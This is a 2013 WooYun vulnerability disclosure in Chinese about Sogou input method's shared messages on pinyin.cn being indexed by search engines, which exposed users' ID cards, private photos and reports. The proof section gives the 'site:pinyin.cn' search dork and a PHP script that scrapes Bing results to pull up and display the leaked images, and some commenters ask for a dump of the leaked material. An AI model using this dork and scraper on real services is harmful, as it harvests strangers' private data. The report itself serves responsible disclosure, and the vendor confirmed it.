当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-023081

漏洞标题:搜狗输入法可导致大量用户敏感信息泄露

相关厂商:搜狗

漏洞作者: 镇长

提交时间:2013-05-04 18:21

修复时间:2013-06-05 16:00

公开时间:2013-06-05 16:00

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-05-04: 细节已通知厂商并且等待厂商处理中
2013-05-05: 厂商已经确认,细节仅向厂商公开
2013-05-15: 细节向核心白帽子及相关领域专家公开
2013-05-25: 细节向普通白帽子公开
2013-06-04: 细节向实习白帽子公开
2013-06-05: 细节向公众公开

简要描述:

搜狗输入法信息发送过程存储了相对应的信息在云端,但由于相应配置及其他原因造成会话信息【图片、视频、音频】泄露。其中很多身份证、果照、还有检举信!!!

详细说明:

搜狗输入法信息发送过程存储了相对应的信息,由于不严谨造成信息被搜索引擎抓取。
Google或者bing:
输入关键词:site:pinyin.cn
[bing=3,700 条结果],[Google=约 1,120 条结果 ]

1.png


2.png


3.jpg


122.png

漏洞证明:

为了验证方便,写了一段代码这个是针对bing的结果弄的。
直接这种形式去查看吧,挺方便还支持翻页哦亲!

<?php
set_time_limit(0);
$url = 'http://cn.bing.com/search?q=site%3apinyin.cn&qs=n&pq=site%3apinyin.cn&sc=0-4&sp=-1&sk=&first={ddddd}1&FORM=PERE';
$i = $_GET['i'];
	$api = file_get_contents(str_replace('{ddddd}',$i,$url));
	preg_match_all('/<a href=\"http:\/\/pinyin.cn\/([a-zA-Z0-9]+)?\"/',$api,$a);
	foreach($a[1] as $v) {
		$api = file_get_contents('http://pinyin.cn/'.$v);
		preg_match('/<a target="_blank" href="(.*?)">/',$api,$aa);
		if($aa) {
			echo '<br>';
			echo '<a target="_blank" href="http://pinyin.cn/'.$v.'">http://pinyin.cn/'.$v.'</a>:';
			echo '<img class=\'round_img\' id=\'round_img\' src="'.$aa[1].'" border=0 max-width="210px" max-height="210px" />';
		}
}

修复方案:

短信发送时可以带一组查看码(如4位字符),打开链接时输入查看码才能查看内容。

版权声明:转载请注明来源 镇长@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2013-05-05 12:20

厂商回复:

收到,感谢反馈

最新状态:

暂无

漏洞评价:

评论

  1. 2013-05-04 18:33 | blue 认证白帽子 ( 普通白帽子 | Rank:779 漏洞数:68 | 我心中有猛虎,细嗅蔷薇。)

    都泄漏啥了?艳照门?

  2. 2013-05-04 18:49 | liner ( 普通白帽子 | Rank:165 漏洞数:27 )

    楼主准备跑路吧,11年搜狗输入法就带后门了,有类似功能的软件还有好几款

  3. 2013-05-04 18:52 | QQ852451559 ( 实习白帽子 | Rank:79 漏洞数:18 | 学生党)

    哈哈。。黑阔们,你们一直都在天朝的监控之下。

  4. 2013-05-04 18:53 | 镇长 ( 路人 | Rank:17 漏洞数:2 | 乌云小镇,镇长!)

    @liner 真的假的?没事的,我们镇上我最大,谁来杀谁啊!

  5. 2013-05-04 18:56 | 镇长 ( 路人 | Rank:17 漏洞数:2 | 乌云小镇,镇长!)

    @QQ852451559 我不是黑客啊,不说了。我下地干活去了,地里的农药还没打完呢,来发个漏洞就走了。

  6. 2013-05-04 19:50 | ACGT ( 实习白帽子 | Rank:32 漏洞数:4 | another script kiddie)

    楼主自求多福吧,这个功能是跟衙门合作的,不信去zone搜一下

  7. 2013-05-04 21:31 | liner ( 普通白帽子 | Rank:165 漏洞数:27 )

    @镇长 准备跑吧....他们为了这个可是花了力气的...

  8. 2013-05-04 21:46 | shine 认证白帽子 ( 普通白帽子 | Rank:831 漏洞数:76 | coder)

    面对地对地导弹的精准打击,在田地里伪装成辛勤劳作的农民是没有用的!

  9. 2013-05-04 22:35 | 镇长 ( 路人 | Rank:17 漏洞数:2 | 乌云小镇,镇长!)

    @shine 不要吓唬我啊,我第一次提交漏洞啊。还年轻,前辈们别吓唬我啊!

  10. 2013-05-05 10:20 | 专业种田 认证白帽子 ( 核心白帽子 | Rank:1425 漏洞数:165 | 没有最专业的农民,只有更努力地耕耘..........)

    @镇长 现在打农药都是晚上进行的吗,交流下,我最近也搞科学种田:)

  11. 2013-05-05 10:27 | 镇长 ( 路人 | Rank:17 漏洞数:2 | 乌云小镇,镇长!)

    @专业种田 给害虫吃的,下午正好他们需要进食。

  12. 2013-05-05 12:32 | liner ( 普通白帽子 | Rank:165 漏洞数:27 )

    @镇长 你这搞的人BJ G ||A 又得重新请主管吃饭,程序又得重新设计后门了

  13. 2013-05-05 14:26 | 廷廷 ( 路人 | Rank:0 漏洞数:1 | 有很强的好奇心,爱好广泛,求女女带走。。...)

    @镇长,目测今晚会有人去你家借拖拉机

  14. 2013-06-05 16:16 | liyang ( 路人 | Rank:25 漏洞数:10 | 低调 沉默 守望)

    要火了~现在竟然还能搜到~

  15. 2013-06-05 16:28 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    我靠,官方一个多月了居然还没修!

  16. 2013-06-05 16:38 | 呆子不开口 ( 普通白帽子 | Rank:324 漏洞数:25 | 求各种兼职)

    @疯狗 从底层就没考虑,估计不好修了

  17. 2013-06-05 16:48 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @呆子不开口 目前搜狗自残中。。

  18. 2013-06-05 16:48 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:17 | 当我又回首一切,这个世界会好吗?)

    都没有节操

  19. 2013-06-05 16:49 | 基佬库克 ( 实习白帽子 | Rank:75 漏洞数:15 | 简介什么的是直接爆菊吧..)

    搜不到了..robot处理了

  20. 2013-06-05 16:49 | 呆子不开口 ( 普通白帽子 | Rank:324 漏洞数:25 | 求各种兼职)

    @疯狗 不可能删除,可能是换地址了,可以抓包再看看

  21. 2013-06-05 17:15 | x-star ( 普通白帽子 | Rank:124 漏洞数:13 | Windows/Linux Kernel. Information Secur...)

    已经看不了了

  22. 2013-06-05 17:18 | rhfs ( 路人 | Rank:8 漏洞数:1 | rhfs.cc)

    已经搜不到了。来晚了。

  23. 2013-06-05 17:58 | xiaogui ( 实习白帽子 | Rank:88 漏洞数:15 | 围观大牛来了~~~)

    来晚了,后悔啊~~~

  24. 2013-06-05 19:39 | 海绵宝宝 ( 普通白帽子 | Rank:243 漏洞数:50 | 唯有梦想与好姑娘不可辜负.)

    来晚了,后悔啊~~~~~

  25. 2013-06-05 19:53 | ayys ( 路人 | Rank:2 漏洞数:2 | 欢迎交流,熟悉正方教务系统漏洞。专业挖洞...)

    来晚了。。。。啊。。。。。。

  26. 2013-06-05 19:58 | niliu 认证白帽子 ( 核心白帽子 | Rank:1542 漏洞数:189 | 逆流而上)

    擦,又晚了

  27. 2013-06-05 20:02 | p0di ( 普通白帽子 | Rank:121 漏洞数:17 | 1+1 = 2 ?)

    哥们自己没少看吧?

  28. 2013-06-05 20:56 | Damo ( 普通白帽子 | Rank:209 漏洞数:31 | 我只是喜欢看加菲猫而已ส็็็็็็็็...)

    来晚了呀来晚了

  29. 2013-06-05 23:46 | x0ers ( 路人 | Rank:25 漏洞数:4 | 专注计算机:开机关机重启20年。)

    啊啊啊啊啊啊,来晚了,楼主把你打包的发出来吧,好人一身平安,你懂的!

  30. 2013-06-05 23:55 | 镇长 ( 路人 | Rank:17 漏洞数:2 | 乌云小镇,镇长!)

    @p0di 哎,我一个种地的,为什么发个漏洞会引起如此大的效果。弄得我到现在还不敢睡觉,明天一早还要下地干活啊。

  31. 2013-06-05 23:55 | 镇长 ( 路人 | Rank:17 漏洞数:2 | 乌云小镇,镇长!)

    @x0ers 我一个种地的留这些干啥啊。

  32. 2013-06-06 13:09 | 小土豆 ( 普通白帽子 | Rank:129 漏洞数:22 )

    小屌丝 膜拜神牛。

  33. 2013-06-06 14:34 | 唐纳德 ( 路人 | Rank:8 漏洞数:1 | 网站站长)

    其他的搜索引擎可以搜到结果,但是提示文件已过期,和谐掉了吧

  34. 2013-06-06 20:00 | 黄色沙漠 ( 路人 | Rank:11 漏洞数:1 )

    谷歌hack哈

  35. 2013-11-08 11:21 | kid23 ( 路人 | Rank:0 漏洞数:1 | 1+1=10)

    @镇长 噗,是你挑的图片太劲爆